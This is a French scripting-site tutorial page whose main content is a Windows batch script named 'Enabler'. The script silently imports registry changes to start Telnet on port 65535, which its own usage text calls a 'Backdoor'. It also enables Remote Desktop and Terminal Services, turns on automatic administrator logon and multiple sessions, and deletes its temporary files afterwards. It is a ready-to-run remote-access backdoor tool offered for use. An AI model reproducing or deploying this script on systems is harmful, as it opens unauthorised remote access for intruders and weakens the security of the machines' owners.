ACCUEILFORUMSGALERIEPROJETSTELECHARGEMENTSTUTORIAUXRECHERCHESTATISTIQUESCONTACT
MEMBRES
Pseudo
Pass

Enregistrez-vous vite!
DERNIERS MEMBRES
  TaibiaPompirm
  Neethakzelt
  Oretlystats
  viperprays
  Golmindalin
  Voir la liste des membres
INFORMATIONS
 Aujourd'hui: 919
 Pages vues: 1420764
 Visiteurs actuels: 6
 Membres enregistrés: 1083
PARTENAIRES
 
 Bienvenue sur le site français des scripteurs
 StatsBot : site Gratuit de statistiques de salons IRC

  GOOGLE

TUTORIAUX

Enabler Telnet, RemoteDesktop and Terminal Service (05/04/2006)
Voici un petit code à mettre dans un fichier .bat.

:Make
@echo off
TITLE Enabeler
color 8e
cls
echo +----------------------------------------------------+
echo ¦ "Enabler" ¦
echo +----------------------------------------------------+
echo.
IF "%1"=="-t" goto telnet
IF "%1"=="-T" goto telnet
IF "%1"=="-r" goto remdesk
IF "%1"=="-R" goto remdesk
IF "%1"=="-s" goto termserv
IF "%1"=="-S" goto termserv
IF "%1"=="" goto use
goto use

:telnet
@echo off
TITLE Enabeler
color 8e
cls
@echo REGEDIT4>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg
echo. >>temp.reg
echo "ErrorControl"=dword:00000001>>temp.reg
echo "Start"=dword:00000002>>temp.reg
echo "Type"=dword:00000010>>temp.reg
echo "FailureActions"=hex& #58;00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e

a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>temp.reg
echo. >>temp.reg
echo "NTLM"=dword:00000001>>temp.reg
echo "TelnetPort"=dword:0000ffff>>temp.reg
echo.
regedit /s temp.reg
echo Starting Service
net start tlntsvr
echo cleanup
del /q temp.reg
goto exit

:remdesk
TITLE Enabeler
color 8e
cls
@echo off
echo Windows Registry Editor Version 5.00> c:\RD.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\RD.reg
echo "fDenyTSConnections"=dword:00000000>> c:\RD.reg
echo "fAllowToGetHelp"=dword:00000000>> c:\RD.reg
regedit /s c:\RD.reg
del /q c:\RD.reg
goto exit

:termserv
TITLE Enabeler
color 8e
cls
@echo off
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "AllowTSConnections"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AutoAdminLogon"="1">> c:\TS.reg
@echo --[ Registering the service... ]
echo.
REGEDIT /S C:\TS.REG
REGEDIT -S C:\TS.REG
echo [Components] >> c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
echo Starting Service
net start TermServ
goto exit

:use
@echo off
TITLE Enabeler
color 8e
cls
echo +----------------------------------------------------+
echo ¦ "Enabler" ¦
echo +----------------------------------------------------+
echo.
echo User: enabler [Option]
echo.
echo Options: -t Enable [T]elnet as Backdoor on 2k (maybe XP)
echo -r Enable [R]emoteDesktop on Win XP
echo -s Enable Terminal [S]ervices on XP/2000/2003
echo.
pause

:exit


Auteur: jhd
Hits: 4061
Ajouter un commentaire - Retour aux Tutoriaux

Pour ajouter un commentaire vous devez être enregistré et identifié.

DERNIERS TUTORIAUX
  Enabler Telnet, RemoteDesktop and Terminal Service
  Programmation BATCH
  Commandes BNC
  Utiliser le logiciel Multiproxy
  Liste des ports
TELECHARGEMENTS
  Vienna
  Transmission
  
  HandBrake
  Développez Magazine Hors série Java
FORUMS
  Easiest Method To Make...
  Easiest Method To Make...
  Easiest Method To Make...
  How easy earn $ 1000 a...
  How earn $ 1000 a week?
GALERIE D'IMAGES
mirc MMORPG beta
 
creation perso 240*320 pour mobilephone
 
FTPlouf
 
2xmoinscher
 
naruto
 
Page affichée en 0.013 sec - Tous droits réservés ©jhdscript.com 2005